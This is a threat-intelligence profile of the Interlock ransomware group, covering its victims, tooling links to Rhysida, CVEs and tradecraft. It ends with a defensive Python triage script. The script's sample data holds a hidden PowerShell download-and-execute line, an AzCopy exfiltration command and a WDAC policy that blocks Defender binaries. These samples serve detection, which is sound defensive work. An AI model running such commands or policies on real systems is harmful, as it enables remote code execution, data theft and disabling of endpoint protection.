Interlock
Interlock is a financially motivated ransomware group, tracked by IBM X-Force as Hive0163, that has run ransomware campaigns since September 2024. The reporting collected here describes Interlock targeting healthcare and other critical infrastructure, education, local government and administration, and other large organizations in North America and Europe. Incidents attributed or associated with Interlock in that reporting include DaVita, Kettering Health, Goodwill Industries International, Lexington-Richland School District Five, West Lothian Council, and Texas Tech University Health Sciences Center.

The group is described as particularly active against education: one report puts 27.3% of its listed victims in that sector, well above the broader ransomware average. Other reporting lists its historical targets as education, engineering, architecture, construction, manufacturing, industrial, healthcare, government, and public sector organizations.

Interlock is tied to the TAG-124 / KongTuke / Woodgnat traffic distribution and initial access ecosystem. KongTuke/Woodgnat is described as an initial access broker selling access to ransomware groups including Interlock, and Interlock is also reported to use or benefit from TAG-124 traffic distribution services.

Interlock is further associated with Rhysida through overlapping malware and tooling. IBM X-Force reported strong connections between the two, including shared use of the Supper backdoor (also tracked as SocksShell or WINDYTWIST), code similarities among Supper, InterlockRAT, NodeSnake, JunkFiction, and ModeloRAT, and likely overlapping developers or trusted code sharing. Cisco Talos had earlier assessed with low confidence that Interlock may have emerged from Rhysida operators or developers.
Tactics and techniques named in the reporting include trojanized software installers, fake Microsoft Teams download pages, traffic distribution systems, ClickFix-style lures, and fake browser updates for initial access and payload delivery. Interlock has repeatedly been linked to TAG-124, which is also tracked as LandUpdate808. IBM describes methodical post-compromise activity: credential theft, use of AzCopy and Advanced Port Scanner, and a custom Windows Defender Application Control (WDAC) policy found on Interlock staging servers, built to block Defender and endpoint protection binaries.

Amazon threat intelligence reported that Interlock exploited CVE-2026-20131 in Cisco Secure Firewall Management Center beginning January 26, 2026, 36 days before public disclosure, and also observed ConnectWise ScreenConnect, Certify, Volatility, custom JavaScript and Java remote access trojans, a fileless memory-resident Java backdoor, and PowerShell-based reconnaissance.

Interlock shares tactics, tooling, and encryption behavior with Rhysida, but the exact relationship is unknown. Nothing in the reporting describes Interlock as a nation-state actor.
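The post-compromise tradecraft above suggests two cheap checks a responder can run: triage process-creation telemetry for ClickFix-style Run-dialog launches, AzCopy copies to Azure Blob storage, Advanced Port Scanner, and WDAC policy deployment; and inspect a recovered WDAC policy for Deny rules aimed at security-product binaries. The script below is an added example, not code from the cited reporting or from Mallory. The events and the policy XML are constructed inline; field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine) and the WDAC policy uses the real urn:schemas-microsoft-com:sipolicy schema, but the list of security binaries and the rule thresholds are assumptions to tune for your environment.

```python
"""Triage helpers for the Interlock tradecraft named above (added example)."""
import re
import xml.etree.ElementTree as ET

# Assumed binary names of endpoint protection products; extend for your estate.
SECURITY_PRODUCT_BINARIES = {
    "msmpeng.exe", "mssense.exe", "sensecncproxy.exe",        # Defender / MDE
    "fortiedrcollectorservice.exe",                           # FortiEDR collector
    "sentinelagent.exe", "csfalconservice.exe",               # other EDRs
}
SHELLS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# Hidden window, encoded command, inline IEX, or a URL in a Run-dialog launch.
CLICKFIX_CMD = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s|iex\b|invoke-expression|https?://")


def basename(path):
    """Last path component, lower-cased, so rules compare on the image name only."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (event_index, rule_name) pairs for events matching the named tradecraft."""
    hits = []
    for i, ev in enumerate(events):
        img = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        low = ev.get("CommandLine", "").lower()
        # ClickFix: the victim pastes into Win+R, so explorer.exe is the parent of the shell.
        if parent == "explorer.exe" and img in SHELLS and CLICKFIX_CMD.search(low):
            hits.append((i, "clickfix_run_dialog"))
        # AzCopy pushing data to attacker-controlled blob storage.
        if img == "azcopy.exe" and "blob.core.windows.net" in low:
            hits.append((i, "azcopy_to_blob"))
        if "advanced_port_scanner" in img or "advanced port scanner" in low:
            hits.append((i, "advanced_port_scanner"))
        # WDAC policy pushed with CiTool or dropped straight into the active policy folder.
        if (img == "citool.exe" and "--update-policy" in low) or "codeintegrity\\cipolicies\\active" in low:
            hits.append((i, "wdac_policy_deploy"))
    return hits


def denied_security_binaries(policy_xml):
    """Names of security-product binaries that a WDAC policy explicitly denies."""
    ns = {"p": "urn:schemas-microsoft-com:sipolicy"}
    root = ET.fromstring(policy_xml)
    return [d.get("FileName", "") for d in root.findall("p:FileRules/p:Deny", ns)
            if d.get("FileName", "").lower() in SECURITY_PRODUCT_BINARIES]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://example.invalid/fix)"'},
    {"Image": r"C:\Users\jdoe\Downloads\azcopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'azcopy copy "D:\\share" "https://stor.blob.core.windows.net/c?sv=..." --recursive'},
    {"Image": r"C:\Tools\Advanced_Port_Scanner_2.5.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "Advanced_Port_Scanner_2.5.exe"},
    {"Image": r"C:\Windows\System32\CiTool.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "CiTool.exe --update-policy C:\\Temp\\policy.cip -json"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "chrome.exe --profile-directory=Default"},
]

# Constructed WDAC policy in the style of a Defender-blocking policy (not the actor's real file).
SAMPLE_POLICY = """<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy" PolicyType="Base Policy">
  <VersionEx>10.0.0.0</VersionEx>
  <Rules><Rule><Option>Enabled:Unsigned System Integrity Policy</Option></Rule></Rules>
  <FileRules>
    <Deny ID="ID_DENY_1" FriendlyName="block defender" FileName="MsMpEng.exe" MinimumFileVersion="65535.65535.65535.65535"/>
    <Deny ID="ID_DENY_2" FriendlyName="block mde" FileName="MsSense.exe" MinimumFileVersion="65535.65535.65535.65535"/>
    <Allow ID="ID_ALLOW_1" FriendlyName="allow everything else" FileName="*"/>
  </FileRules>
</SiPolicy>"""

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
    print("WDAC denies:", denied_security_binaries(SAMPLE_POLICY))
```

The WDAC check expects policy XML; the binary .cip files under CodeIntegrity\CiPolicies\Active must be recovered as XML from the staging host or build pipeline first, which this script assumes has already happened. The MinimumFileVersion of 65535.65535.65535.65535 on a Deny rule is the standard WDAC idiom for "deny every version of this file name".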
Tradecraft
66 distinct techniques observed across reporting, grouped by MITRE ATT&CK tactic.
Associated malware families
5 malware families attributed to this actor across reporting.
Associated vulnerabilities
3 CVEs this actor has used in observed campaigns, all 3 exploited in the wild.
CVE-2026-20131: Cisco Secure Firewall Management Center, network edge device vulnerability exploited by Interlock for initial access
CVE-2025-61155: gaming anti-cheat driver zero-day abused by the Hotta Killer tool (Interlock) to attack FortiEDR
CVE-2023-36036: Windows Cloud Files Mini Filter Driver local privilege escalation exploit (JunkFiction-crypted) used by Interlock and ModeloRAT operators
Observables
83 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
Referenced as a downstream ransomware operation that may purchase access from Woodgnat.
Named as a ransomware crew that purchases or uses access brokered by KongTuke/Woodgnat.
Named as a ransomware crew previously linked to attacks involving KongTuke-provided access.
Referenced as one of the ransomware groups whose attacks have involved ModeloRAT.